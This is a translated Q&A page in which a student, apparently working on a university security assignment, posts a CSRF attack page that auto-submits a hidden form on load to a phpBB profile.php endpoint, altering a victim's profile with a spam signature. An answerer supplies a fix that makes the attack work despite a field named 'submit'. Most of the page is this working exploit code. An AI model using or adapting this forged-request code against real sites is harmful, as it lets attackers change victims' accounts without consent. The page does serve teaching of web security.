1. 首頁
  2. 問答
  3. 如何解決使用document.createElement(「形式」)之間的衝突。提交和&提交=提交

如何解決使用document.createElement(「形式」)之間的衝突。提交和&提交=提交

2012-08-22 25 views
0

下面的代碼創建一個POST聲明必須在&結束時提交=「提交」如何解決使用document.createElement(「形式」)之間的衝突。提交和&提交=提交

不幸的是這將創建一個衝突DOM表單對象。

我無權訪問Web應用程序,因爲這是大學安全分配的一部分。我已經能夠通過代理手動編輯數據,並將該元素添加到POST主體,該主體已成功運行,但我希望能夠通過自動代碼完成此操作。

任何幫助將不勝感激。

<html> 
<body> 
<h1> 
This page sends a HTTP POST request onload. </h1> 
<script> 
function post(url,fields) { 
//create a <form> element. 
var p = document.createElement('form'); 
//construct the form 
p.action = url; 
p.innerHTML = fields; 
p.target = '_self'; 
p.method = 'post'; 
//append the form to this page 
document.body.appendChild(p); 
//submit the form 
p.submit(); 
} 
function csrf_hack() { 
var fields; 
// You should replace/augment the following lines with 
// your form parameters 
fields += "<input type='hidden' name='username' value='bob'>"; 
fields += "<input type='hidden' name='email' value='[email protected]'>"; 
fields += "<input type='hidden' name='cur_password' value=''>"; 
fields += "<input type='hidden' name='new_password' value=''>"; 
fields += "<input type='hidden' name='password_confirm' value=''>"; 
fields += "<input type='hidden' name='icq' value=''>"; 
fields += "<input type='hidden' name='aim' value=''>"; 
fields += "<input type='hidden' name='msn' value='456'>"; 
fields += "<input type='hidden' name='yim' value=''>"; 
fields += "<input type='hidden' name='website' value=''>"; 
fields += "<input type='hidden' name='location' value=''>"; 
fields += "<input type='hidden' name='occupation' value=''>"; 
fields += "<input type='hidden' name='interests' value='Hacking'>"; 
fields += "<input type='hidden' name='signature' value='Free spicy sauce @ www.getyourfreespicysauce.com'>"; 
fields += "<input type='hidden' name='viewemail' value='0'>"; 
fields += "<input type='hidden' name='hideonline' value='0'>"; 
fields += "<input type='hidden' name='notifyreply' value='0'>"; 
fields += "<input type='hidden' name='notifypm' value='1'>"; 
fields += "<input type='hidden' name='popup_pm' value='1'>"; 
fields += "<input type='hidden' name='attachsig' value='1'>"; 
fields += "<input type='hidden' name='allowbbcode' value='1'>"; 
fields += "<input type='hidden' name='allowhtml' value='0'>"; 
fields += "<input type='hidden' name='allowsmilies' value='1'>"; 
fields += "<input type='hidden' name='language' value='english'>"; 
fields += "<input type='hidden' name='style' value='1'>"; 
fields += "<input type='hidden' name='timezone' value='0'>"; 
fields += "<input type='hidden' name='dateformat' value='D M d, Y g:ia'>"; 
fields += "<input type='hidden' name='mode' value='editprofile'>"; 
fields += "<input type='hidden' name='agreed' value='true'>"; 
fields += "<input type='hidden' name='coppa' value='0'>"; 
fields += "<input type='hidden' name='sid' value='341942b39d0e2af257286aabd65b1e31'>"; 
fields += "<input type='hidden' name='user_id' value='4'>"; 
fields += "<input type='hidden' name='current_email' value='[email protected]'>"; 
//this causes p.submit to not be invoked 
fields += "<input type='hidden' name='submit' value='Submit'>"; 

post('http://www.originalphpbb.com/profile.php',fields); 


} 
window.onload = function() { csrf_hack(); } 
</script> 
</body></html>

來源

2012-08-22 SKR

回答

0

在窗體上創建一個輸入type="submit",整個事情追加到頁面,然後調用.click()type="submit"按鈕。

function post(url, fields) { 
    //create a <form> element. 
    var p = document.createElement('form'); 
    //construct the form 
    p.action = url; 
    p.innerHTML = fields; 
    p.target = '_self'; 
    p.method = 'post'; 
    //append the form to this page 
    var s = document.createElement("input"); 
    s.type = "submit"; 
    p.appendChild(s); 
    document.body.appendChild(p); 
    //submit the form 
    s.click(); 
}

演示概念:http://jsfiddle.net/9dMxC/1/

來源

2012-08-22 06:33:18 Esailija

+0

謝謝你的。這完全解決了問題!我已經引用你作爲我的報告的參考。 – SKR

相關問題

 相關問題